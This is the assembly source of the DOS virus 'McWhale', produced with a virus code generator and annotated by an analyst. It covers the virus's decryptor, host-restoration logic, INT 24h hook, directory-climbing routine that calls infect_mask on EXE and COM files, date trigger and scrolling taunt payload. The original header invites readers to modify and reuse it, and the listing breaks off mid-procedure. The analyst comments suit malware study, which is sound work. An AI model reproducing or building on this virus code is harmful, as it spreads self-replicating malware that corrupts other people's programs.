📄 mcwhale.asm
; McWhale.asm : [McAfee' Whale] by [pAgE]
; Created wik the Phalcon/Skism Mass-Produced Code Generator
; from the configuration file skeleton.cfg
;
; Here's another "lame dick" virus! I thought it was rather fitting!
; Many thanks to the fellows at Phalcon/Skism for this little tool.
; I am sure that Dark Angel and the bunch are not stopping here, but
; will come up with another innovation in Vx production...
;
; I have set this file to activate at a 40% chance on any day. Feel free
; to modify this program as you see fit or keep it as a novelty in its
; original form.
; --- Analyst notes: assembler setup, entry stub and decryptor ---------
; 16-bit DOS image, tiny model, assembled at offset 100h (COM layout).
.model tiny ; Handy directive
.code ; Virus code segment
org 100h ; COM file starting IP
; 'MO' is later compared against SP to tell an EXE host from a COM host.
id = 'MO' ; ID word for EXE infections
; E9 00 00 is a near jmp with a zero displacement, so in this image
; execution simply continues at decrypt.
entry_point: db 0e9h,0,0 ; jmp decrypt
; Decryptor: walks the body one word at a time from startencrypt and adds
; a 16-bit key to each word. The count is the distance to 'heap' (defined
; outside this view) in words.
; Everything from entry_point up to startencrypt is never touched by the
; loop, so apart from the key word this stub is the plaintext region a
; static signature has to anchor on.
decrypt: ; handles encryption and decryption
mov bx,(offset heap - offset startencrypt)/2 ; iterations
patch_startencrypt:
mov si,offset startencrypt ; start of decryption
decrypt_loop:
; The instruction is emitted as raw bytes so that the following dw can
; serve as its immediate operand: the key lives inside the instruction
; stream (self-modifying pattern). NOTE(review): presumably the key and
; the offset at patch_startencrypt are rewritten per copy by a routine
; outside this view - confirm.
db 2eh,81h,04h ; add word ptr cs:[si], xxxx
; Key = 0 makes the add a no-op, so this listing runs unencrypted.
decrypt_value dw 0 ; initialised at zero for null effect
inc si ; calculate new decryption location
inc si
dec bx ; If we are not done, then
jnz decrypt_loop ; decrypt mo'
; --- Analyst notes: delta offset and restoration of the host header ---
; First code inside the range processed by the decrypt loop. It computes
; where the body actually sits in memory, then puts back the host bytes
; that were saved in the data area so the host can be resumed later.
startencrypt:
; call/pop pair: the pushed return address is the run-time address of
; 'next'; subtracting the assembled offset yields the relocation delta.
; All later data references are written as [bp+symbol] for this reason.
call next ; calculate delta offset
next: pop bp ; bp = IP next
sub bp,offset next ; bp = delta offset
; SP == 'MO' is used as the EXE marker. NOTE(review): presumably the
; initial SP of an infected EXE is set to this value by the infection
; routine, which is outside this view - confirm.
cmp sp,id ; COM or EXE?
je restoreEXE
restoreCOM:
; COM host: copy the 3 saved bytes at save3 back to offset 100h
; (1 byte via movsb here + 1 word via movsw at restoreEXIT).
lea si,[bp+save3]
mov di,100h
; 100h stays on the stack and is consumed by the retn at returnCOM.
push di ; For later return
movsb
jmp short restoreEXIT
restoreEXE:
; EXE host: keep the entry DS/ES on the stack (popped again at
; returnEXE), then work with DS = ES = CS.
push ds
push es
push cs ; DS = CS
pop ds
push cs ; ES = CS
pop es
; Copy 8 bytes (3 x movsw here + 1 at restoreEXIT) starting at jmpsave2
; into jmpsave/stacksave, the working copies used for the final far jump
; and stack switch.
lea si,[bp+jmpsave2]
lea di,[bp+jmpsave]
movsw
movsw
movsw
restoreEXIT:
; Shared final word copy for both the COM and the EXE path.
movsw
; --- Analyst notes: environment setup and directory traversal ---------
; Observable DOS activity in this stretch, in order: set DTA (21h/1Ah),
; get current directory (21h/47h), read and replace the INT 24h vector
; (21h/35h, 21h/25h), then repeated CHDIR ".." (21h/3Bh).
; numinfec, newDTA, origdir, backslash, oldint24, int24, exe_mask,
; com_mask, dot_dot and infect_mask are all defined outside this view.
mov byte ptr [bp+numinfec],2 ; reset infection counter
mov ah,1Ah ; Set new DTA
lea dx,[bp+newDTA] ; new DTA @ DS:DX
int 21h
mov ah,47h ; Get current directory
mov dl,0 ; Current drive
lea si,[bp+origdir] ; DS:SI->buffer
int 21h
; exit_virus later passes origdir-1 to CHDIR, so this byte is presumably
; the one immediately before origdir - confirm against the data layout.
mov byte ptr [bp+backslash],'\' ; Prepare for later CHDIR
; INT 24h is the DOS critical-error handler. The old vector is saved so
; exit_virus can put it back. NOTE(review): the replacement handler is
; not visible here; presumably it suppresses error prompts - confirm.
mov ax,3524h ; Get int 24 handler
int 21h ; to ES:BX
mov word ptr [bp+oldint24],bx; Save it
mov word ptr [bp+oldint24+2],es
; Only AH is reloaded; the call depends on AL still holding 24h from the
; mov ax,3524h above.
mov ah,25h ; Set new int 24 handler
lea dx,[bp+offset int24] ; DS:DX->new handler
int 21h
push cs ; Restore ES
pop es ; 'cuz it was changed
; Loop: process the EXE mask and the COM mask in the current directory,
; then move one level up. CHDIR sets carry on failure, which ends the
; loop. NOTE(review): presumably that happens at the root directory.
dir_scan: ; "dot dot" traversal
lea dx,[bp+exe_mask]
call infect_mask
lea dx,[bp+com_mask]
call infect_mask
mov ah,3bh ; change directory
lea dx,[bp+dot_dot] ; "cd .."
int 21h
jnc dir_scan ; go back for mo!
; --- Analyst notes: payload trigger -----------------------------------
; Decides whether the display payload ('activate') runs.
; INT 21h/2Ah returns CX = year, DH = month, DL = day of month.
; The time query (21h/2Ch) below is commented out, so DL still holds the
; day of month (1-31) when it is compared with 40. As written the jbe is
; therefore always taken: the payload runs on every execution, which does
; not match the "40% chance" stated in the file header.
done_infections:
mov ah,2ah ; Get current date
int 21h ;
;cmp dh,4 ; Check month
;jb exit_virus ;
;cmp dl,15 ; Check date
;jnz exit_virus ;
;mov ah,2ch ; Get current time
;int 21h
cmp dl,40 ; Check the percentage
jbe activate
; --- Analyst notes: cleanup and return to the host --------------------
; Undoes the environment changes made earlier (INT 24h vector, current
; directory, DTA) and transfers control back to the original program.
; This label is not reached by fall-through from the trigger check above
; it when that branch is taken; any other entry is outside this view.
exit_virus:
mov ax,2524h ; Restore int 24 handler
lds dx,[bp+offset oldint24] ; to original
int 21h
; lds changed DS; point it back at the code segment.
push cs
pop ds
mov ah,3bh ; change directory
lea dx,[bp+origdir-1] ; original directory
int 21h
; AH/DX are prepared here, but the int 21h is issued per branch because
; the EXE path first needs DS restored to its entry value.
mov ah,1ah ; restore DTA to default
mov dx,80h ; DTA in PSP
; restoreEXE pushed DS and ES (4 bytes), so an EXE host is recognised by
; SP == id-4 at this point.
cmp sp,id-4 ; EXE or COM?
jz returnEXE
returnCOM:
int 21h
; Pops the 100h pushed in restoreCOM: execution resumes at the restored
; start of the COM host.
retn ; 100h is on stack
returnEXE:
; Recover the entry ES/DS saved by restoreEXE.
pop es
pop ds
int 21h
; The saved CS and SS values are segment-relative; add the segment that
; follows the 256-byte PSP (PSP segment + 10h) to both.
mov ax,es ; AX = PSP segment
add ax,10h ; Adjust for PSP
add word ptr cs:[bp+jmpsave+2],ax
add ax,word ptr cs:[bp+stacksave+2]
cli ; Clear intrpts for stack manipulation
mov sp,word ptr cs:[bp+stacksave]
mov ss,ax
sti
; Opcode EA (far jmp) is emitted as data so that the jmpsave dword right
; after it becomes its operand: jump to the host's original CS:IP.
db 0eah ; jmp ssss:oooo
jmpsave dd ? ; Original CS:IP
stacksave dd ? ; Original SS:SP
; jmpsave2 (1 byte) + save3 (3 bytes) share one 4-byte slot: for an EXE
; host it is read as a dword, for a COM host as the 3 saved header bytes.
jmpsave2 db ? ; Actually four bytes
; Default CD 20 = int 20h (terminate), followed by a zero byte.
save3 db 0cdh,20h,0 ; First 3 bytes of COM file
stacksave2 dd ?
; --- Analyst notes: display payload -----------------------------------
; Prints a scrolling text banner through the BIOS teletype service until
; a key is pressed. No file or disk writes occur in this procedure as
; shown; the only DOS call is the keyboard poll (21h/06h).
; sub_2, sub_3 and loc_10 are referenced here but defined elsewhere.
activate proc far
start:
jmp loc_1
data_1 db 0 ; current scroll start index
data_2 dw 0 ; CX returned by int 10h/03h (cursor shape)
db 62h, 79h ; ASCII 'by'
db ' ABRAXAS - '
copyright db '(c) 1992 Abraxas Warez.'
db '.....................................BEWARE!!!............'
db '....................'
data_5 db 'Anti-Virus.....Man.....John.....McAfee.....wrote'
db '.....the.....WHALE.....virus!!!'
db '..............................HONEST!!!....................................$'
loc_1:
push si
push di
; Offset 80h of the PSP holds the command-tail length byte; sub_1
; increments SI before testing, so scanning starts at 81h.
mov si,80h
cld ; Clear direction
call sub_1
; 0Dh terminates the command tail: nothing was typed after the program
; name, so the built-in text is left untouched.
cmp byte ptr [si],0Dh
je loc_4 ; Jump if equal
; Otherwise copy up to 28h (40) command-tail characters over the start
; of data_5, stopping at the terminating 0Dh.
mov cx,28h
lea di,data_5 ; di -> data_5 text (destination for stosb)
locloop_2:
lodsb ; String [si] to al
cmp al,0Dh
je loc_3 ; Jump if equal
stosb ; Store al to es:[di]
loop locloop_2 ; Loop if cx > 0
loc_3:
; Pad with '.' for the remaining count plus one.
inc cx
mov al,2Eh ; '.'
rep stosb ; Rep when cx >0 Store al to es:[di]
loc_4:
pop di
pop si
mov ah,3
mov bh,0
int 10h ; Video display ah=functn 03h
; get cursor loc in dx, mode cx
mov data_2,cx
; NOTE(review): start line 0Fh / end line 00h likely hides the cursor -
; confirm.
mov ah,1
mov cx,0F00h
int 10h ; Video display ah=functn 01h
; set cursor mode in cx
mov ah,2
mov dh,18h
mov dl,13h
int 10h ; Video display ah=functn 02h
; set cursor location in dx
loc_5:
; 0FFh + 1 wraps to 0: restart the scroll from the first character.
mov data_1,0FFh
loc_6:
; Advance the start index by one and print a 27h (39) character window.
add data_1,1
mov bl,data_1
mov bh,0
mov cx,27h
call sub_2
locloop_7:
mov al,byte ptr copyright+20h[bx] ; ('.')
mov ah,0Eh
int 10h ; Video display ah=functn 0Eh
; write char al, teletype mode
inc bx
; NOTE(review): sub_3 is not visible; presumably a delay - confirm.
call sub_3
; DL = 0FFh selects direct console input; ZF is set when no key is
; waiting, so jnz leaves the loop on a key press.
mov dl,0FFh
mov ah,6
int 21h ; DOS Services ah=function 06h
; special char i/o, dl=subfunc
jnz loc_10 ; Jump if not zero
loop locloop_7 ; Loop if cx > 0
; '$' (24h) marks the end of the text: start over from index 0.
cmp byte ptr copyright+20h[bx],24h ; ('.') '$'
je loc_5 ; Jump if equal
jmp short loc_6
activate endp
; sub_1: advance SI past space characters.
; In:  SI = address one byte before the first byte to examine
; Out: SI = address of the first byte that is not 20h (' ')
; SI is incremented before the first test, so the byte at the incoming SI
; is never examined. Flags on return are those of the final cmp.
; The scan has no length limit; it stops only at a non-space byte.
sub_1 proc near
loc_8:
inc si
cmp byte ptr [si],20h ; ' '
je loc_8 ; Jump if equal
retn
sub_1 endp
sub_2 proc near
push ax
push bx
push cx
push dx
mov dx,si
mov cx,di
mov al,4
mov ah,0ch
int 10h
mov ah,2
mov dh,8h
mov dl,14h
mov cx,30
int 10h ; Video display ah=functn 02h
mov ah,10h
mov al,0
mov bl,4
mov bh,63
int 10h
pop dx
pop cx
pop bx